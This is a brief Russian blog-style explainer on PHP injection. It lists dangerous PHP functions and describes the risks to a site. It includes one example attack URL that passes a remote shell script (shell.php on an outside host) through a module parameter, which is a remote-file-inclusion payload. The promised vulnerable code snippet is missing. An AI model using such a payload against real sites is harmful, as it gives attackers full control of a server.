апр
10
Что такое PHP injection?
PHP инъекция (англ. PHP injection) - это еще один вид «инъекций», которые может получить Ваш веб-сайт. Также, как и SQL инъекция, представляет собой угрозу из разряда «максимальной» опасности. В случае успешности PHP инъекции Ваш сайт будет 100% взломан, именно сто, а не как многие любят говорить 99,9%.
Со столь высокой степенью угрозы PHP инъекции согласна и OWASP (Open Web Application Security Project), называя эту опасность для веб приложений и сайтов максимальной.
Атакующий сервер хакер используя уязвимость благодаря PHP injection получает возможность выполнил произвольный шелл-код. Тем самым открывая себе полный доступ к серверу по протоколу FTP, а дальше только его «буйная фантазия».
Наиболее опасна PHP инъекция для тех сайтов, естественно функционирующих с поддержкой PHP, на которых ограничена или вообще отсутствует проверка входящих параметров и данных.
Вот перечень потенциально опасных функций в языке PHP:
- create_function
- eval
- include
- include_once
- preg_replace (с использованием модификатора «e»)
- require
- require_once
Рассмотрим пример кода, представляющего собой потенциальную уязвимость на гипотетическом сайте или на нашем http://av-host.net:

http:// av-host.net /index.php?module_name=http://it-kmm.com/shell.php
и получая при этом полный, неконтролируемый доступ к площадке такого сайта.
И самое опасное в PHP injection – это то, что такой взлом сайта может оставаться очень долго, либо вообще незамеченным как для администратора веб-сервиса, так и для его владельца. Если это конечно не был дефейс или еще какая пакость, направленная на деструкцию сайта (может взломщик просто зашел по ссылке «смотри фильмы онлайн», а ему там что-то не понравилось, и он «обиделся»).